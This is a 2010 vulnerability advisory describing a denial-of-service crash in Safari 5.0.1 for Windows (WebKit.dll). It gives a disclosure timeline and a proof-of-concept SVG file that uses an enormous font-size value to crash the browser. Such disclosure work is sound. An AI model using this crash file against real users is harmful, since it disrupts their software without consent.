################################################### Safari for windows Invalid SGV text style Webkit.dll DoS Vendor URL:www.apple.com Advisore:http://lostmon.blogspot.com/2010/08/safari-for-windows-invalid-sgv-text.html Vendor notify :Yes exploit available :YES ################################################### Safari browser for windows is prone vulnerable to a Denial of service condition , this issue affects webkit.dll and cause a crash when Safari try to render a SGV image with a very long font size text style. ############ versions ############ Safari for windows 5.0.1 (7533.17.8) on windows 7 ultimate fully patched. Safari for windows windows 5.0.1 (7533.17.8) on windows xp home sp3 fully patched ############ Timeline ############ Discovered:19-08-2010 vendor notify:25-08-2010 Vendor response:26-08-2010 Disclosure: 30-09-2010 #################### Proof Of Concept #################### Save This code as image.svg and open it with Safari,look i have add some "extra" pixels in font size text style. ################ BOF image.svg ###################### <?xml version="1.0"?> <svg xmlns="http://www.w3.org/2000/svg" width="200" height="200" version="1.1"> <defs> <mask id="crash"> <polygon points="155.5,45.6146 181.334,119.935 260,121.538 197.3,169.074 220.085,244.385 155.5,199.444 90.9154,244.385 113.7,169.074 51,121.538 129.666,119.935" transform="matrix(1 0 0 1.04643 1.9873e-014 -6.73254) translate(-52.381 -37.9218)" style="fill:rgb(255,255,255);stroke:rgb(0,0,0);stroke-width:1" /> </mask> </defs> <g mask="url(#crash)" style="font-family:Verdana; font-size: 10pt; fill:red;"> <text x="80" y="80" style="font-size:111000000pt; fill:pink;">Safari</text> <text x="0" y="130" style="font-size: 60pt; fill:pink;">Now</text> <text x="20" y="190" style="font-size: 60pt; fill:pink;">Crash</text> </g> </svg> ###############EOF#################### ################# €nd ############### Thnx To Climbo for his patience and support. -- atentamente: Lostmon (lostmon@xxxxxxxxx) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....